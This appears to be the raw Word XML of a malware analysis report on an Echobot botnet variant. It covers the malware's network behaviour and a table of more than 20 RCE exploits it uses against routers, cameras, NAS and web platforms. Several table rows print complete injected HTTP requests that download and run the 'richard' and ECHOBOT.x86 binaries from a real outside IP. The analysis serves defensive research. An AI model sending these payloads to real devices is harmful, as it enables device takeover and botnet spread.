      </w:r>
      <w:r w:rsidR="00227353">
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B4FD5">
        <w:t>network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>behaviour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0034293C">
        <w:t xml:space="preserve"> and system calls</w:t>
      </w:r>
      <w:r w:rsidR="005405A7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005405A7">
        <w:t xml:space="preserve">In the figure below we can see </w:t>
      </w:r>
      <w:r w:rsidR="00826463">
        <w:t>some of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:r w:rsidR="00262B61">
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> strings being sent in real time to multiple IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD6A69" w14:textId="0ADC28BE" w:rsidR="004B7434" w:rsidRDefault="00090647" w:rsidP="00200B5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B13C848" wp14:editId="46864FC7">
            <wp:extent cx="5943600" cy="265811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ABA" w14:textId="6B9FCFC2" w:rsidR="00F406FC" w:rsidRPr="001F4F1E" w:rsidRDefault="00090647" w:rsidP="001F4F1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Random strings being sent to Multiple IP addresses via STD Module captured by strace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A62169" w14:textId="71FAF69A" w:rsidR="00275A33" w:rsidRDefault="00275A33" w:rsidP="00275A33">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc101201916"/>
      <w:r>
        <w:t>Exploits</w:t>
      </w:r>
      <w:r w:rsidR="00F71DCF">
        <w:t>/Vunlerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="43D365B6" w14:textId="1A95F7F6" w:rsidR="00D20D25" w:rsidRPr="00D20D25" w:rsidRDefault="00BE7AC8" w:rsidP="00D20D25">
      <w:r>
        <w:t xml:space="preserve">This Echobot variant uses multiple </w:t>
      </w:r>
      <w:r w:rsidR="00A51EB2">
        <w:t xml:space="preserve">RCE (Remote Code Execution) </w:t>
      </w:r>
      <w:r w:rsidR="002707F3">
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to infect and propagate to other </w:t>
      </w:r>
      <w:r w:rsidR="00DC3CA9">
        <w:t xml:space="preserve">vulnerable </w:t>
      </w:r>
      <w:r>
        <w:t>IoT devices</w:t>
      </w:r>
      <w:r w:rsidR="005468FD">
        <w:t xml:space="preserve"> to be used in the botnet</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F55AC3">
        <w:t xml:space="preserve"> Most of the common vulnerabilities we found targeted network routers and devices,</w:t>
      </w:r>
      <w:r w:rsidR="00D87E73">
        <w:t xml:space="preserve"> wireless</w:t>
      </w:r>
      <w:r w:rsidR="00F55AC3">
        <w:t xml:space="preserve"> cameras</w:t>
      </w:r>
      <w:r w:rsidR="00744F37">
        <w:t>, cloud platforms</w:t>
      </w:r>
      <w:r w:rsidR="007D45FD">
        <w:t>, NAS systems</w:t>
      </w:r>
      <w:r w:rsidR="00F55AC3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F55AC3">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F55AC3">
        <w:t xml:space="preserve"> servers.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F06E4">
        <w:t>We counted more than 20 exploits</w:t>
      </w:r>
      <w:r w:rsidR="00DF2A99">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="002F06E4">
        <w:t xml:space="preserve"> were used in this sample. </w:t>
      </w:r>
      <w:r w:rsidR="00D43116">
        <w:t>A list</w:t>
      </w:r>
      <w:r w:rsidR="00D20D25">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00D43116">
        <w:t xml:space="preserve"> some of</w:t>
      </w:r>
      <w:r w:rsidR="00D20D25">
        <w:t xml:space="preserve"> the CVE exploits that we found</w:t>
      </w:r>
      <w:r w:rsidR="000A0F19">
        <w:t xml:space="preserve"> are listed below</w:t>
      </w:r>
      <w:r w:rsidR="00D20D25">
        <w:t xml:space="preserve"> while analyzing the malware statically via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D20D25" w:rsidRPr="00C452A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binutils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C1BFA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D20D25">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D20D25" w:rsidRPr="00C452A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D20D25">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1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129"/>
        <w:gridCol w:w="5604"/>
        <w:gridCol w:w="2197"/>
      </w:tblGrid>
      <w:tr w:rsidR="00972FBC" w14:paraId="3058B384" w14:textId="02177A9D" w:rsidTr="00696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24CE3DB" w14:textId="29677BE1" w:rsidR="00972FBC" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ACE2B3D" w14:textId="49320F59" w:rsidR="00972FBC" w:rsidRDefault="00972FBC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604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125DA578" w14:textId="72397ED4" w:rsidR="00972FBC" w:rsidRDefault="00972FBC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 Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C78CBC" w14:textId="7D45E008" w:rsidR="00972FBC" w:rsidRDefault="00972FBC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ed Device</w:t>
            </w:r>
            <w:r w:rsidR="003D15AE">
              <w:t>s/</w:t>
            </w:r>
            <w:r w:rsidR="001106BD">
              <w:t>Systems</w:t>
            </w:r>
            <w:r w:rsidR="00130FD2">
              <w:t>/Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="0E141F45" w14:textId="576EEEE0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5EB8C65" w14:textId="7023DC03" w:rsidR="00972FBC" w:rsidRPr="00DA32D4" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00DA32D4">
              <w:t>CVE_2013_7471</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4875D66F" w14:textId="794B503F" w:rsidR="00972FBC" w:rsidRDefault="00AE7C3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6BB02EB2" w14:textId="64AF97FF" w:rsidR="00972FBC" w:rsidRDefault="00972FBC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FBC">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00972FBC">
              <w:t>soap.cgi?service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00972FBC">
              <w:t>=WANIPConn1 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A4E313" w14:textId="77777777" w:rsidR="00972FBC" w:rsidRDefault="005A6D0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Link Devices:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55CEEB67" w14:textId="7804A926" w:rsidR="005A6D0F" w:rsidRDefault="005A6D0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D0F">
              <w:t>DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="036EFAAE" w14:textId="7E29BB0F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C205451" w14:textId="345FD36F" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>Sar2HTML_</w:t>
            </w:r>
            <w:r w:rsidR="00C9250F">
              <w:t>3.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F4F6D1D" w14:textId="771C7226" w:rsidR="00972FBC" w:rsidRDefault="00972FBC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519A22A" w14:textId="4710C586" w:rsidR="00972FBC" w:rsidRDefault="00982B5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B5A">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>index.php?plot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>=;cd</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>; ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00982B5A">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FA3D31" w14:textId="008CE915" w:rsidR="00972FBC" w:rsidRDefault="003D15AE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P web application </w:t>
            </w:r>
            <w:r w:rsidR="00130FD2">
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidR="00BC7215">
              <w:t>latforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="23A6F6FF" w14:textId="180A3554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23FE56" w14:textId="2323D0F8" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>3Com_OfficeConnect_RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AE10FAC" w14:textId="40B19D08" w:rsidR="00972FBC" w:rsidRDefault="00154019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722F893" w14:textId="67DFB7B6" w:rsidR="00972FBC" w:rsidRDefault="0045798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82">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>utility.cgi?testType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t>=1&amp;IP=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>aaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve"> || cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00457982">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AAC97A7" w14:textId="05466739" w:rsidR="00972FBC" w:rsidRDefault="0045798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82">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CD6114">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve">om </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CD6114">
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="00457982">
              <w:t>ffice</w:t>
            </w:r>
            <w:r w:rsidR="00CD6114">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00457982">
              <w:t>onnect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00457982">
              <w:t xml:space="preserve"> network</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> routers and </w:t>
            </w:r>
            <w:r w:rsidRPr="00457982">
              <w:t>devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="2D46CB97" w14:textId="47515557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A73FFE6" w14:textId="2BD8A4FD" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00D20D25">
            <w:r w:rsidRPr="00D20D25">
              <w:lastRenderedPageBreak/>
              <w:t>CVE_2019_16072</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F2D05EE" w14:textId="08D9EFD0" w:rsidR="00972FBC" w:rsidRDefault="00C17004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6D493A19" w14:textId="00B2DC09" w:rsidR="00972FBC" w:rsidRDefault="00C94DD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DF">
              <w:t>POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&amp;hst_id=none&amp;snmpv3_profile_id=&amp;ip_address=|cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C94DDF">
              <w:t>/richard;/evil.php|php&amp;snmp_ro_string=public&amp;mib_oid=system&amp;mib_oid_manual=.1.3.6.1.2.1.1&amp;snmp_version=1 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1643D528" w14:textId="43815892" w:rsidR="00BB7EBE" w:rsidRPr="00BB7EBE" w:rsidRDefault="00C17004" w:rsidP="00BB7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004">
              <w:t>NETSAS Enigma NMS 65.0.0</w:t>
            </w:r>
            <w:r w:rsidR="00306F47">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="499DFC8E" w14:textId="43551E3F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685EA75" w14:textId="3B9DFC08" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CVE_2013_5912</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A80579C" w14:textId="395103EE" w:rsidR="00972FBC" w:rsidRDefault="00AE7C3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8ADABA0" w14:textId="2F99663F" w:rsidR="00972FBC" w:rsidRDefault="00BA73BE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3BE">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>VhttpdMgr?action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>importFile&amp;fileName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>=cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33763200" w14:textId="34E5270B" w:rsidR="00972FBC" w:rsidRDefault="00BA73BE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3BE">
              <w:t>Thomson</w:t>
            </w:r>
            <w:r w:rsidR="00F96D93">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve">Reuters Velocity Analytics </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>Vhayu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve"> Analytic Server</w:t>
            </w:r>
            <w:r w:rsidR="00F96D93">
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E35D48">
              <w:t>V</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA73BE">
              <w:t xml:space="preserve">6.94 </w:t>
            </w:r>
            <w:r w:rsidR="000C3C80">
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA73BE">
              <w:t>uild 2995</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="3435CAD3" w14:textId="5868FF0B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D4BA96" w14:textId="5A6E6FE5" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CVE_2018_20841</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1106BBB3" w14:textId="32C037A5" w:rsidR="00972FBC" w:rsidRDefault="00A10394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A5B8623" w14:textId="3D344006" w:rsidR="00972FBC" w:rsidRDefault="0069670C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0C">
              <w:t>POST /protocol.csp?function=set&amp;fname=security&amp;opt=mac_table&amp;flag=close_forever&amp;mac=|cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t xml:space="preserve"> http://80.82.67.184/ECHOBOT.x86; curl -O http://80.82.67.184/ECHOBOT.x86; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t xml:space="preserve"> +x ECHOBOT.x86</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>/ECHOBOT.x86 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0D290E" w14:textId="621671E9" w:rsidR="00972FBC" w:rsidRDefault="0069670C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670C">
              <w:t>HooToo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069670C">
              <w:t>TripMate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069670C">
              <w:t xml:space="preserve"> Titan HT-TM05 and HT-05 routers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="796919DF" w14:textId="46ECD2AE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5AE7EBC" w14:textId="4EA8A1B2" w:rsidR="00972FBC" w:rsidRPr="00F71DCF" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CCBill_</w:t>
            </w:r>
            <w:r w:rsidR="00DF7C47">
              <w:t>CGI_</w:t>
            </w:r>
            <w:r w:rsidR="00EA585F">
              <w:t>2003_</w:t>
            </w:r>
            <w:r w:rsidRPr="00D20D25">
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5240D401" w14:textId="646B0021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C43F215" w14:textId="77777777" w:rsidR="00972FBC" w:rsidRDefault="00BB2A5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A52">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>ccbill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>whereami.cgi?g</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>=cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
